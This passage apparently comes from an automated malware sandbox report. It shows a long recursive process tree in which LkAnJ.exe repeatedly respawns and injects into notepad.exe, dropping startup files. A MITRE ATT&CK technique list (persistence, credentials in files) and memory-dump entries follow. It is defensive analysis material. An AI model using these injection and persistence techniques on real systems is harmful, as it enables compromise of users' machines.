        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4880 217562
        43⤵
        Executes dropped EXE
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        44⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4932
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        45⤵
        Drops startup file
        
        PID:5008
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        45⤵
        
        PID:5020
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 5020 218937
        45⤵
        
        PID:1364
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        46⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:3668
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        47⤵
        Drops startup file
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        47⤵
        
        PID:4996
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4996 220390
        47⤵
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        48⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:5040
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        49⤵
        Drops startup file
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        49⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3644 221812
        49⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        50⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4124
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        51⤵
        Drops startup file
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        51⤵
        
        PID:4180
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4180 223218
        51⤵
        
        PID:4264
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        52⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4256
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        53⤵
        Drops startup file
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        53⤵
        
        PID:820
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 820 224765
        53⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        54⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:3648
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        55⤵
        Drops startup file
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        55⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3444 226140
        55⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        56⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4188
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        57⤵
        Drops startup file
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        57⤵
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1776 227546
        57⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        58⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:3924
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        59⤵
        Drops startup file
        
        PID:492
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        59⤵
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3440 228875
        59⤵
        
        PID:504
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        60⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:1008
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        61⤵
        Drops startup file
        
        PID:1252
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        61⤵
        
        PID:1308
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1308 230343
        61⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        62⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:3340
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        63⤵
        Drops startup file
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        63⤵
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4480 231781
        63⤵
        
        PID:3788
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        64⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4372
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        65⤵
        Drops startup file
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        65⤵
        
        PID:4644
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4644 233203
        65⤵
        
        PID:4588
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        66⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4720
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        67⤵
        Drops startup file
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        67⤵
        
        PID:4740
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4740 234687
        67⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        68⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4748
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        69⤵
        Drops startup file
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        69⤵
        
        PID:4808
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4808 236078
        69⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        70⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4976
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        71⤵
        Drops startup file
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        71⤵
        
        PID:4984
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4984 237531
        71⤵
        
        PID:4928
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        72⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:5008
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        73⤵
        Drops startup file
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        73⤵
        
        PID:4572
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4572 238953
        73⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        74⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:5060
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        75⤵
        Drops startup file
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        75⤵
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1872 240390
        75⤵
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        76⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:3336
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        77⤵
        Drops startup file
        
        PID:4112
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        77⤵
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4152 241843
        77⤵
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        78⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:3748
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        79⤵
        Drops startup file
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        79⤵
        
        PID:4308
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4308 243296
        79⤵
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        80⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4296
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        81⤵
        Drops startup file
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        81⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4356 244718
        81⤵
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        82⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4424
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        83⤵
        Drops startup file
        
        PID:604
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        83⤵
        
        PID:4468
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4468 246062
        83⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        84⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:2496
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        85⤵
        Drops startup file
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        85⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1796 247500
        85⤵
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        86⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:1996
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        87⤵
        Drops startup file
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        87⤵
        
        PID:3452
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3452 248890
        87⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        88⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:1684
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        89⤵
        Drops startup file
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        89⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1296 250390
        89⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        90⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:2168
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        91⤵
        Drops startup file
        
        PID:1432
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        91⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4472 251796
        91⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        92⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4616
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        93⤵
        Drops startup file
        
        PID:4688
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        93⤵
        
        PID:4676
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4676 253187
        93⤵
        
        PID:4760
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        94⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:1088
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        95⤵
        Drops startup file
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        95⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4796 254703
        95⤵
        
        PID:4832
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        96⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4948
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        97⤵
        Drops startup file
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        97⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 5032 256328
        97⤵
        
        PID:3540
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        98⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:5020
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        99⤵
        Drops startup file
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        99⤵
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4024 257656
        99⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        100⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:5044
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        101⤵
        Drops startup file
        
        PID:5004
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        101⤵
        
        PID:4108
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4108 259125
        101⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        102⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:3644
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        103⤵
        Drops startup file
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        103⤵
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4128 260546
        103⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        104⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4272
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        105⤵
        Drops startup file
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        105⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4292 261921
        105⤵
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        106⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:1908
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        107⤵
        Drops startup file
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        107⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1544 263343
        107⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        108⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:4228
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        109⤵
        Drops startup file
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        109⤵
        
        PID:3012
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3012 264781
        109⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        110⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:2744
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        111⤵
        Drops startup file
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        111⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 632 266203
        111⤵
        
        PID:492
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        112⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:2044
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        113⤵
        Drops startup file
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        113⤵
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 408 267625
        113⤵
        
        PID:3904
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        114⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        
        PID:1308
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        115⤵
        Drops startup file
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        115⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4556 269078
        115⤵
        
        PID:4636

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/812-6-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/812-11-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/1000-103-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-91-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-101-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-102-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-33-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

Filesize
4KB

Download
memory/1000-100-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-98-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-104-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-97-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-93-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-105-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-106-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-108-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-109-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-52-0x00000000055A0000-0x00000000055A1000-memory.dmp

Filesize
4KB

Download
memory/1000-76-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-77-0x0000000005690000-0x0000000005691000-memory.dmp

Filesize
4KB

Download
memory/1000-78-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-79-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-90-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-81-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-83-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-117-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-84-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-85-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-116-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-110-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-115-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-88-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-114-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
memory/1000-111-0x0000000003340000-0x0000000003341000-memory.dmp

Filesize
4KB

Download
